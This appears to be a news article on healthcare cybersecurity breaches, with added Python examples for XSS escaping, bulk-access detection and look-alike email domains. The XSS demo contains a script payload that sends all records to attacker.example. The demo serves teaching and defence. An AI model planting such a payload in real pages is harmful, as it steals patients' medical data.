Anthem made history in February 2015 when the records of 78.8 million of its current and former customers were exposed. It was the biggest health care breach on record, and in a landmark year it opened the floodgates: the Department of Health and Human Services' Office for Civil Rights (OCR) reported that over 113 million medical records were compromised in some way last year. Think of it this way: if each of those records belonged to a different person, one out of every three Americans would be a victim.
By comparison, this year is looking tame so far. However, it is only March, and already 3.5 million medical records have been compromised. A list maintained by the U.S. Department of Health and Human Services shows nearly four health care data breaches per week on average so far in 2016.
Avi Rubin, an information security expert and computer scientist, said in January at the USENIX Enigma Conference, while discussing the current state of hospital cybersecurity, that it is pretty bad when you think about it, since all of us interact with the health care system.
Before being named director of the Health and Medical Security Lab at Johns Hopkins University, Rubin provided cybersecurity services to companies across many industries, including retail chains, car rental companies and banks. When it came to cybersecurity problems, he said, the health care sector was the absolute worst.
Rubin said the data security practices in the health care industry were far beneath those of every other industry.
In fact, in 2015 the health care sector ranked second for U.S. data breaches and placed within the top 10 in Verizon's global breach report.
So how do things look on the front lines? CIO John Halamka reportedly stated at South by Southwest that Beth Israel Deaconess in Boston gets hacked once every seven seconds. In 2011, 2,000 patient X-rays were stolen from Beth Israel Deaconess by cybercriminals in China. According to Halamka, the scans are often sold to Chinese citizens who cannot pass the health exams required for their travel visas.
However, medical cybersecurity gets little mention in mainstream discussions, such as on the campaign trail. During the Republican presidential debates, the words "cyber warfare," "cyber attack" and "hack" were mentioned only 16 times. The Democratic candidates' record is even worse, with "cyber warfare" mentioned only once, by Senator Jim Webb at the October 13th debate. In their primary debates, neither major party has used any of those terms in relation to health care cybersecurity.
The following are three reasons why everybody should be concerned.
1. Health records have turned into currency
According to James Scott, senior fellow and co-founder of the Institute for Critical Infrastructure Technology (ICIT) in Washington, D.C., electronic health records are now considered 100 times more valuable than stolen credit cards. Institute members meet regularly with tech experts and lawmakers to help shape cybersecurity policy. Although numerous safeguards exist for financial information, there are far fewer protections for health data, which according to Scott is much more valuable.
Money on credit cards is insured. When the bank is backed by the FDIC, most individuals whose credit card numbers are stolen don't end up losing money, says Scott; the banks make up the difference. With electronic health records, however, the payoff is the main reason insurance companies and hospitals are such large targets.
Scott said that on dark web forums a single Medicaid or Medicare electronic health record can bring in $500. The global information service Experian has estimated that health records are worth as much as 10 times more than credit card numbers on the black market.
Scott said that buying 100 electronic health records gets you everything on those individuals: their addresses, Social Security numbers, their jobs, their children. Malicious individuals like having as much intelligence as possible, and for both experienced and inexperienced hackers, health care is the easiest thing to attack.
The healthcare industry loses an estimated $5.6 billion a year due to data breaches.
2. The cybersecurity at your hospital may be leaky
Health care is a particularly vulnerable corner of the cybersecurity landscape. With the rise of personalized medicine, self-care and health trackers, regulators, doctors and patients all want easier ways to access patient information. Rubin said that opening up massive highways for storing and sharing data without the right digital protections can be very dangerous.
Over the past two years, Independent Security Evaluators was hired to try to penetrate the cybersecurity of two health care data centers and 12 health care facilities in the U.S., in an experiment designed to identify vulnerabilities.
At one hospital, the team was able to hack into a computerized medicine dispensary by scattering USB sticks containing malware across several of its floors. Each of the 18 USB sticks bore the hospital's logo, which might have been enough to convince an unsuspecting employee to plug one in. In a malicious attack, the attacker might have altered drug dosages, a potentially life-threatening situation for a patient. At another hospital, an unguarded lobby kiosk was used to access patient blood work records. In theory these could have been switched so that the wrong treatment was administered.
Independent Security Evaluators reports that websites are another target for cybercriminals. The team posed as a patient and logged into an electronic health record site, but filled in the patient information fields with malicious code rather than patient data (a stored cross-site scripting attack). Once an unsuspecting nurse or doctor viewed the new patient's information, the code ran in their browser, giving the attacker the ability to modify every patient health record in the database, according to a published report from Independent Security Evaluators.
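The flaw behind that attack is worth seeing in code. The following is an added example, not code from Independent Security Evaluators or from the article: a minimal EHR record renderer written the vulnerable way (untrusted field values pasted straight into HTML) beside the hardened version (every value HTML-escaped). The patient record, the HTML table, and the URLs inside the injected script are all constructed for the demo and are hypothetical.

```python
"""Added example (not ISE's or the article's code): a stored cross-site
scripting flaw of the kind described above, beside its hardened form.

The EHR intake record and the HTML template are constructed for the demo;
the endpoint names in the injected script are hypothetical.
"""
import html
import re

# Constructed record: the "patient" typed a script tag into the allergies
# field instead of a real value. The URLs inside it are hypothetical.
MALICIOUS_RECORD = {
    "name": "Jane Doe",
    "allergies": (
        '<script>fetch("/api/records?all=1")'
        '.then(r => r.text())'
        '.then(t => fetch("https://attacker.example/drop", {method: "POST", body: t}))'
        "</script>"
    ),
}

# Any unescaped "<script" in the rendered page means the browser would run it.
LIVE_SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_vulnerable(record):
    """Flawed pattern: untrusted field values concatenated straight into HTML.
    Whatever the patient typed is sent to the clinician's browser as markup."""
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in record.items())
    return f"<table>{rows}</table>"


def render_safe(record):
    """Hardened: every untrusted value is HTML-escaped before insertion, so a
    script tag is displayed as text rather than executed."""
    rows = "".join(
        f"<tr><td>{html.escape(str(k))}</td><td>{html.escape(str(v))}</td></tr>"
        for k, v in record.items()
    )
    return f"<table>{rows}</table>"


def contains_live_script(page_html):
    """Crude check used by the demo: is there an unescaped <script tag?"""
    return bool(LIVE_SCRIPT_RE.search(page_html))


if __name__ == "__main__":
    print("vulnerable page executes script:", contains_live_script(render_vulnerable(MALICIOUS_RECORD)))
    print("escaped page executes script:   ", contains_live_script(render_safe(MALICIOUS_RECORD)))
```

`html.escape` is the right fix for values dropped into HTML element content; a value placed inside an attribute, a URL, or a JavaScript block needs the encoding for that context instead, and a Content-Security-Policy that forbids inline script limits the damage when one spot is missed.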
To prevent breaches at hospitals, Rubin recommends policies such as multifactor authentication, limits on who is allowed to look at medical charts, and encryption of all patient data. He also said the number of searches made against a hospital database should be monitored, to catch situations where hackers might be downloading large batches of health records at once.
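That last recommendation is a detection rule, and here is one way to write it. This is an added example, not code from Rubin or from any hospital: it runs over an audit log and flags any user who touches more than a threshold of distinct patient records inside a sliding time window. The log format (timestamp, user, action, patient id), the ten-minute window, the threshold of 20, and every log line are assumptions constructed for the demo.

```python
"""Added example (not Rubin's or any hospital's code): flagging users who
touch an unusual number of distinct patient records in a short window,
the kind of monitoring the paragraph above recommends.

The audit-log format (timestamp user action patient_id), the window and
the threshold are assumptions; all log lines below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed audit log. nurse_k views 9 charts over an hour (normal),
# svc_backup re-reads one chart 30 times in a minute (noisy, but one patient),
# contractor_x pulls 40 different charts in four minutes at 2 a.m. (bulk pull).
AUDIT_LOG = (
    [f"2016-03-01T09:{m:02d}:00 nurse_k VIEW_CHART P{1000 + m}" for m in range(0, 60, 7)]
    + [f"2016-03-01T03:00:{s:02d} svc_backup VIEW_CHART P9999" for s in range(0, 60, 2)]
    + [f"2016-03-01T02:{m // 10:02d}:{(m % 10) * 6:02d} contractor_x VIEW_CHART P{3000 + m}"
       for m in range(40)]
)


def parse_line(line):
    ts, user, action, patient = line.split()
    return datetime.fromisoformat(ts), user, action, patient


def flag_bulk_access(lines, window=timedelta(minutes=10), threshold=20):
    """Sliding-window count of distinct patients per user.

    Returns {user: peak distinct-patient count} for every user whose count
    inside any `window`-long span exceeds `threshold`. Counting distinct
    patients (not raw events) keeps a clinician re-opening one chart from
    tripping the alarm while a batch download still does."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e[0])
    recent = defaultdict(deque)   # user -> chronological (ts, patient) pairs in window
    flagged = {}
    for ts, user, _action, patient in events:
        q = recent[user]
        q.append((ts, patient))
        while ts - q[0][0] > window:   # drop events that fell out of the window
            q.popleft()
        distinct = len({p for _, p in q})
        if distinct > threshold and distinct > flagged.get(user, 0):
            flagged[user] = distinct
    return flagged


if __name__ == "__main__":
    for user, peak in flag_bulk_access(AUDIT_LOG).items():
        print(f"ALERT {user}: {peak} distinct patient records within 10 minutes")
```

In practice the threshold should be set per role from a baseline of normal activity (a billing job legitimately reads many records; a floor nurse does not), and the same rule is worth running against export and print events, not only chart views.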
3. You could be missing your cybersecurity's largest flaw
This is because you are probably the largest flaw in your own cybersecurity.
A great example of this is the ongoing problem of ransomware, which holds a victim's files or computer hostage by encrypting them. It has existed in different forms since 1989. Its latest incarnation, crypto ransomware, has spread like wildfire since it emerged three years ago. In the last quarter of 2014, over 128,000 desktop computers were hit with ransomware; by mid-2015 the number had more than doubled, to 337,000 incidents.
Hollywood Presbyterian Medical Center became its most recent high-profile victim when it was hit with ransomware in February. Allen Stefanek, the hospital's president and CEO, described it as a random attack and clearly not malicious, which suggests that a tainted email, rather than a targeted intrusion, was the route in. According to the ICIT, the medical center was hit by the Locky crypto-ransomware, which arrives as a Word document attached to an email in a person's inbox and runs once the recipient opens the document and enables its macros.
This type of attack is referred to as phishing: hackers hide malicious code or a malicious link inside a legitimate-looking web page or email. The fake correspondence is loaded with features designed to get the victim to click, a technique referred to as social engineering.
These attacks come in two common variants, spear phishing and whale phishing, both designed to exploit trust and human nature. The celebrity nude photograph hack was spear phishing via email. A teenager was able to break into the email of CIA Director John Brennan by phishing an employee at Verizon over the phone.
Scott said that spear phishing is when an enemy emails you and it appears to be from a legitimate sender. However, when you look at the url more closely, @newshour.org might be @newshour,co or something like that. Whale phishing occurs when three highly targeted emails are sent. A few emails are designed by the hackers by tailoring them via social engineering research they gather through social media and anything else you might post about yourself online.
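The look-alike address Scott describes is something a mail gateway or a help-desk triage script can check for. The following is an added example, not code from Scott or ICIT: it pulls the real domain out of a From: header, compares it to the organisation's own domain, folds common confusable substitutions (0 for o, vv for w), and also catches the case where only the display name claims to be the trusted brand. The trusted domain, the confusable table, the similarity cutoff and the sample headers are all assumptions constructed for the demo.

```python
"""Added example (not Scott's or ICIT's code): a look-alike sender check for
the spoofed-domain spear phishing described above.

The trusted domain, the confusable-character table, the similarity cutoff
and the sample From: headers are all constructed/assumed for the demo."""
import difflib
from email.utils import parseaddr

TRUSTED_DOMAINS = {"newshour.org"}   # assumed: the organisation's own domain(s)


def sender_domain(from_header):
    """Domain part of the real address, ignoring the display name."""
    _name, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()


def normalize(text):
    """Fold common look-alike substitutions so newsh0ur / nevvshour compare equal
    to newshour. The substitution table is an assumption, not exhaustive."""
    t = text.lower()
    for fake, real in (("vv", "w"), ("rn", "m")):
        t = t.replace(fake, real)
    return t.translate(str.maketrans("0135", "olse"))


def classify(from_header, trusted=TRUSTED_DOMAINS, cutoff=0.85):
    """'trusted' for an exact domain match, 'lookalike' for a domain or
    display name that imitates a trusted one, otherwise 'external'."""
    name, _addr = parseaddr(from_header)
    domain = sender_domain(from_header)
    if domain in trusted:
        return "trusted"
    for t in trusted:
        t_label = t.rsplit(".", 1)[0]            # "newshour" from "newshour.org"
        d_label = domain.rsplit(".", 1)[0]
        if normalize(d_label) == normalize(t_label):      # newshour.co, newsh0ur.org
            return "lookalike"
        if difflib.SequenceMatcher(None, normalize(domain), t).ratio() >= cutoff:
            return "lookalike"                            # newshours.org
        if t_label in normalize(name):                    # brand only in display name
            return "lookalike"
    return "external"


if __name__ == "__main__":
    for hdr in ('Editor <editor@newshour.org>', 'Editor <editor@newshour.co>',
                'Editor <editor@newsh0ur.org>', '"NewsHour Desk" <desk@gmail.com>',
                'Vendor <billing@example.com>'):
        print(f"{classify(hdr):9s} {hdr}")
```

This only inspects the header the sender chose to write; it complements rather than replaces SPF, DKIM and DMARC checks, which verify whether the claimed domain actually authorised the message.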
According to Scott, cyberthieves frequently gather intelligence from social media platforms such as LinkedIn.
They can see where you work and where you went to college. They can dig deeper and look you up on Facebook to find out whether you are married. It usually just comes down to doing their homework.
Scott adds that the key to preventing phishing attacks at hospitals is education.
He said that insurance companies and hospitals need to teach their employees what a spear phishing attack, a spoofed browser or a fake email looks like, and that when they receive one of those strange things, they should forward it to information security.
The suspicious email can then be opened in an isolated virtual machine or sandbox, disconnected from the company's network, so the malicious code never reaches its computers.
President Obama recently announced the Cybersecurity National Action Plan, which commits $62 million to educating cybersecurity personnel. There is no mention, however, of training ordinary people against the social engineering hackers use. If individuals keep opening doors for malicious code, no IT staff or high-tech encryption software can stop it.
Scott said people need to be trained not to click. It is actually a hard thing to teach people to just not click.